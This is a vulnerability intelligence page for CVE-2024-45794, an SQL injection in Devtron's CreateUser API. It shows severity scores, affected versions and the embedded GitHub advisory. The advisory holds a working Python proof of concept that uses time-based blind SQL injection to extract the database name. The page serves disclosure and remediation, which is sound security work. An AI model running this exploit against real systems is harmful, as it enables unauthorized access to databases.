Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

CVE-2024-45794

HIGH
Published 2024-11-07T17:42:58.662Z
Actions:

Expert Analysis

Professional remediation guidance

Get tailored security recommendations from our analyst team for CVE-2024-45794. We'll provide specific mitigation strategies based on your environment and risk profile.

CVSS Score

V3.1
8.3
/10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Base Score Metrics
Exploitability: N/A Impact: N/A

EPSS Score

v2025.03.14
0.004
probability
of exploitation in the wild

There is a 0.4% chance that this vulnerability will be exploited in the wild within the next 30 days.

Updated: 2025-06-25
Exploit Probability
Percentile: 0.576
Higher than 57.6% of all CVEs

Attack Vector Metrics

Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED

Impact Metrics

Confidentiality
HIGH
Integrity
HIGH
Availability
LOW

Description

devtron is an open source tool integration platform for Kubernetes. In affected versions an authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user). This issue has been addressed in version 0.7.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.

Available Exploits

No exploits available for this CVE.

Related News

No news articles found for this CVE.

Affected Products

devtron-labs

devtron

Affected Versions:

< 0.7.2
kubernetes

devtron

Affected Versions:

0.7.2

GitHub Security Advisories

Community-driven vulnerability intelligence from GitHub

✓ GitHub Reviewed HIGH

Devtron has SQL Injection in CreateUser API

GHSA-q78v-cv36-8fxj

Advisory Details

### Summary An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user). ### Details The API is CreateUser (/orchestrator/user). The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104 The userInfo (line 104) parameter can be controlled by users. The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038 The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query. The user should be authenticated but only needs minimum permissions: ![image](https://github.com/user-attachments/assets/08ba940e-33a8-408d-9a1e-9cd1504b95c5) ### PoC Demonstrate a blind SQL injection to retrieve the database name: ``` import requests import time import string import argparse def blind(ip, token, query): url = f"http://{ip}/orchestrator/user" headers = {"token": token} entity = "chart-group" payload = f"'; {query} --" data = {"id": 111, "email_id": "[email protected]", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": "" start = time.time() res = requests.post(url, headers=headers, json = data) end = time.time() #print(res.content) if(end - start > 1): return True return False def main(ip, token): chs = string.printable result = "" is_end = False i = 1 while(not is_end): is_end = True for ch in chs: if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")): print(ch) result += ch is_end = False break i += 1 print(result) if __name__ == "__main__": argparser = argparse.ArgumentParser() argparser.add_argument("--ip", "-i", type=str, help="Target IP") argparser.add_argument("--token", "-t", type=str, help="API TOKEN") args = argparser.parse_args() main(args.ip, args.token) ``` The debugging breakpoint indicated that the malicious SQL query was executed: ![image](https://github.com/user-attachments/assets/c9067360-8fb3-4d64-82e9-3af1e5e60969) We can see that we can get the database name: ![image](https://github.com/user-attachments/assets/29d5d969-876a-452d-be7f-8984d2a28c25) ### Impact SQL injection vulnerability. Our tests indicate that the latest version is affected. The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.

Affected Packages

Go github.com/devtron-labs/devtron
ECOSYSTEM: ≥0 <0.7.2

CVSS Scoring

CVSS Score

7.5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

References

WEB https://github.com/devtron-labs/devtron/security/advisories/GHSA-q78v-cv36-8fxj
ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-45794
WEB https://github.com/devtron-labs/devtron/commit/1540271bd777b6bccd288e513a9070d8f04b6056
PACKAGE https://github.com/devtron-labs/devtron

Advisory provided by GitHub Security Advisory Database. Published: November 7, 2024, Modified: November 7, 2024

References

https://github.com/devtron-labs/devtron/security/advisories/GHSA-q78v-cv36-8fxj
Published: 2024-11-07T17:42:58.662Z
Last Modified: 2024-11-07T19:33:42.084Z
Copied to clipboard!